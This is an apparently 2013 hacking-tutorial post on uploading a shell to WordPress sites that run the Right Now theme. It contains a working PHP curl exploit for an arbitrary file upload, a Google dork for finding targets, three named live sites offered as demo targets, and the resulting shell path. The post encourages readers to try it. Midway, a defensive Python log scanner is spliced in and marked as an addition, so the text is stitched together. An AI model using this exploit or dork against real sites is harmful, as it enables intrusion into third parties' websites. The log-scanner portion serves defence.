WordPress Right Now theme – Arbitrary File Upload Vulnerability

Here is a short tutorial. What I'm posting is how to get a shell onto a website. Some of you probably know this already; this is for those who don't. There's no harm in trying it out, but putting the three names Elite_x, Cryp70n and www.synkoda.com on anything is off limits.

Here is the video.

###############################################################

# Exploit Title: WordPress Right Now theme – Arbitrary File Upload Vulnerability

# Author: Cryp70n

# Date: 10/31/2013

# Category: webapps/php

# Google dork: inurl:wp-content/themes/RightNow/

###############################################################

= = = = = = = =

1)Exploit =

2)Real Demo = http://monroemartincomedy.com//wp-conten…index.html

= = = = = = = =

1)Exploit :

= = = = = = 

<?php

$uploadfile="YourFile.php";

$ch = curl_init("http://[Target]/rightnowwp/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php");

curl_setopt($ch, CURLOPT_POST, true);

curl_setopt($ch, CURLOPT_POSTFIELDS,

array('Filedata'=>"@$uploadfile"));

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$postResult = curl_exec($ch);

curl_close($ch);

print "$postResult";

?>

2) Exploit demo :

= = = = = = = = =

http://brainframe.it/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php

http://swedishhousemafia.it/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php

http://www.iteva.co/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php

# #### #### #### #### #### #### #### #### #

Shell Path : http://[Target]/wp-content/uploads/settingsimages/YourFile.php

# #### #### #### #### #### #### #### #### #
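For site owners, the two paths above are the indicators to look for in web server logs. The following is an added example, not part of the original post or the theme's code: it assumes Apache/nginx "combined" access-log format, the function name `scan` is hypothetical, and the sample log lines are constructed.

```python
import re
from urllib.parse import unquote

# Paths taken from the advisory above.
UPLOAD_ENDPOINT = "/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php"
UPLOAD_DIR = "/wp-content/uploads/settingsimages/"
# Extensions a PHP-enabled server may execute (assumed list; match it to your handler config).
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)
# Combined log format: ip - user [time] "METHOD path PROTO" status size ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+) [^"]*" (\d{3}) ')

SAMPLE = [  # constructed log lines, not from a real server
    '203.0.113.7 - - [31/Oct/2013:10:00:01 +0000] "POST /wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php HTTP/1.1" 200 12 "-" "-"',
    '203.0.113.7 - - [31/Oct/2013:10:00:05 +0000] "GET //wp-content/uploads/settingsimages/YourFile.php HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.4 - - [31/Oct/2013:10:01:00 +0000] "GET /wp-content/uploads/settingsimages/logo.png HTTP/1.1" 200 2048 "-" "-"',
    '198.51.100.4 - - [31/Oct/2013:10:02:00 +0000] "GET /wp-content/themes/RightNow/style.css HTTP/1.1" 200 900 "-" "-"',
]

def scan(lines):
    """Return (kind, ip, time, path, status) tuples for suspicious requests."""
    findings = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        ip, ts, method, target, status = m.groups()
        # Drop the query string, decode %xx escapes, collapse repeated slashes.
        path = re.sub(r"/+", "/", unquote(target.split("?", 1)[0]))
        low = path.lower()
        if method == "POST" and low.endswith(UPLOAD_ENDPOINT.lower()):
            # endswith() also covers installs in a subdirectory such as /rightnowwp/
            findings.append(("upload_post", ip, ts, path, int(status)))
        elif UPLOAD_DIR in low and SCRIPT_EXT.search(low):
            findings.append(("script_in_upload_dir", ip, ts, path, int(status)))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A `script_in_upload_dir` hit with status 200 means a script under the image upload directory was actually served, so that directory should be checked for non-image files. Disabling PHP execution under `wp-content/uploads` limits the impact of any file that lands there.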

So tell me what you think, good or bad, and leave a comment before you go. Don't forget to subscribe to the channel too.

